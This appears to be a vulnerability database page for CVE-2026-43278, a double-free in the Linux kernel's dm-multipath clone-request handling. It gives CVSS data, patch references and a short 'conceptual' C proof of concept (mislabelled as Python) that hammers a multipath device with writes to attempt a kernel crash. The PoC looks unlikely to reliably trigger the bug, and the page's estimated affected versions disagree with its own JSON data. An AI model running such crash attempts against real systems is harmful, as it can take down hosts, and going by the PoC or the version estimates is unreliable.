Security Vulnerability Report
中文
CVE-2026-43278 CVSS 7.8 HIGH

CVE-2026-43278

Published: 2026-05-06 12:16:49
Last Modified: 2026-05-08 19:38:25
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: dm: clear cloned request bio pointer when last clone bio completes Stale rq->bio values have been observed to cause double-initialization of cloned bios in request-based device-mapper targets, leading to use-after-free and double-free scenarios. One such case occurs when using dm-multipath on top of a PCIe NVMe namespace, where cloned request bios are freed during blk_complete_request(), but rq->bio is left intact. Subsequent clone teardown then attempts to free the same bios again via blk_rq_unprep_clone(). The resulting double-free path looks like: nvme_pci_complete_batch() nvme_complete_batch() blk_mq_end_request_batch() blk_complete_request() // called on a DM clone request bio_endio() // first free of all clone bios ... rq->end_io() // end_clone_request() dm_complete_request(tio->orig) dm_softirq_done() dm_done() dm_end_request() blk_rq_unprep_clone() // second free of clone bios Fix this by clearing the clone request's bio pointer when the last cloned bio completes, ensuring that later teardown paths do not attempt to free already-released bios.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.6 (预估)
Linux Kernel < 6.1 (预估)
Linux Kernel < 5.15 (预估)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * Conceptual PoC for CVE-2026-43278 * Triggering the double-free in dm-multipath requires specific I/O patterns. */ #include <stdio.h> #include <fcntl.h> #include <unistd.h> #include <stdlib.h> void trigger_crash() { // Open a device managed by dm-multipath (e.g., /dev/mapper/mpatha) // This requires the system to be configured with dm-multipath. int fd = open("/dev/mapper/mpatha", O_RDWR); if (fd < 0) { perror("Failed to open device"); return; } printf("[*] Sending I/O requests to trigger UAF condition...\n"); char *buffer = malloc(4096); // Continuous write operations to stress the clone request completion path for (int i = 0; i < 10000; i++) { write(fd, buffer, 4096); } free(buffer); close(fd); // If vulnerable, the kernel may hit a double-free or general protection fault } int main() { trigger_crash(); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43278", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:49.213", "lastModified": "2026-05-08T19:38:24.763", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndm: clear cloned request bio pointer when last clone bio completes\n\nStale rq->bio values have been observed to cause double-initialization of\ncloned bios in request-based device-mapper targets, leading to\nuse-after-free and double-free scenarios.\n\nOne such case occurs when using dm-multipath on top of a PCIe NVMe\nnamespace, where cloned request bios are freed during\nblk_complete_request(), but rq->bio is left intact. Subsequent clone\nteardown then attempts to free the same bios again via\nblk_rq_unprep_clone().\n\nThe resulting double-free path looks like:\n\n nvme_pci_complete_batch()\n nvme_complete_batch()\n blk_mq_end_request_batch()\n blk_complete_request() // called on a DM clone request\n bio_endio() // first free of all clone bios\n ...\n rq->end_io() // end_clone_request()\n dm_complete_request(tio->orig)\n dm_softirq_done()\n dm_done()\n dm_end_request()\n blk_rq_unprep_clone() // second free of clone bios\n\nFix this by clearing the clone request's bio pointer when the last cloned\nbio completes, ensuring that later teardown paths do not attempt to free\nalready-released bios."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-415"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.165", "matchCriteriaId": "96EF3286-5BCE-4D88-B8C9-4292E5BA7A18"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.128", "matchCriteriaId": "851E9353-6C09-4CC9-877E-E09DB164A3C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.75", "matchCriteriaId": "BCE16369-98ED-41CF-8995-DFDC10B288D2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.16", "matchCriteriaId": "B4B8CDA9-BADF-4CF5-8B3B-702DE8EEA40B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/7daf279c674d515fb22a727a7bbc92aeb35c5442", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/83d72091804600ead96dc9e9f518ea56cb4942f6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8d9ddad561136f7e6a9346767bf97b4d79e38e67", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b1c1a2637ebd675aa2d71fee8c70da8791d73850", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e2e738e8dfbbf83bd2bae0467ec4420cc52da42a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/fb8a6c18fb9a6561f7a15b58b272442b77a242dd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/3d746b639be4b4f5cd8ce2b06aa52dc443f50edc", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9a95b98202113045bc1a5bcb30388a500f25e050", "source": "[email protected]", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.